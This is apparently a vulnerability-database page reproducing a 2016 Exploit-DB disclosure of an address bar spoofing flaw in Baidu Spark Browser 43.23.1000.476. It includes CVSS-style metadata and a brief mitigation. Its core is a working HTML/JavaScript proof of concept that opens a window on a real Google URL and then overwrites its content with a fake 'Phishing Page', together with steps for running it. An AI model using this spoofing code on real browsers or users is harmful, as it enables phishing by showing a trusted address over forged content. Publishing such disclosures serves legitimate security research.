header-logo
Suggest Exploit
vendor:
Spark Browser
by:
liu zhu
8,8
CVSS
HIGH
Address Bar Spoofing
451
CWE
Product Name: Spark Browser
Affected Version From: 43.23.1000.476
Affected Version To: 43.23.1000.476
Patch Exists: NO
Related CWE: N/A
CPE: a:baidu:spark_browser
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7, Windows XP
2016

Baidu Spark Browser URL spoof vulnerability

The baidu spark browser is vulnerable to Address Bar Spoofing in the latest version of the browser(43.23.1000.476). Using the special javascript code it was able to spoof the URL in the address bar which could trick the user that he is visiting a different site than he thinks. It can be used to phishing attack.

Mitigation:

Users should be aware of the URL they are visiting and should not click on any suspicious links.
Source

Exploit-DB raw data:

<!--
Exploit Title: Baidu Spark Browser URL spoof vulnerability
Date:2016-05-02
Exploit Author: liu zhu
Vendor Homepage:http://en.browser.baidu.com/
<http://en.browser.baidu.com/>Software Link:http://en.browser.baidu.com/query/fullpackage.exe?lang=en
Version:43.23.1000.476
Tested on:Win7/WinXP

details:
The baidu spark browser is vulnerable to Address Bar Spoofing  in the latest version of the browser(43.23.1000.476). Using the specail javascript code it was able to spoof the URL in the address bar which could trick the user that he is visiting a different site than he thinks. it<http://thinks.it/> can be used to phinshing attack.

PoC:
------------------------------------------------------------------------------------------------
-->

<SCRIPT LANGUAGE="JavaScript">
function winopen()
{OW=window.open("", "newwin");
OW.document.write("<TITLE>Google</TITLE>");
OW.document.write("<h1>The Phishing Page !!</h1>");
OW.document.close();
}
</SCRIPT>
<a href="https://www.google.com.hk/" target="newwin" onclick="setTimeout('winopen()', 1);">Google Home Page</a>

<!--
------------------------------------------------------------------------
Save it as a HTML file, and then execute it in Baidu Spark Browser.

Affact:
The vulnerability can be used to Phishing attack, Because the URL can be the same as the URL that the visitor wants to visit,but the content is fake.

Contact:
liuzhu09@huawei.com
-->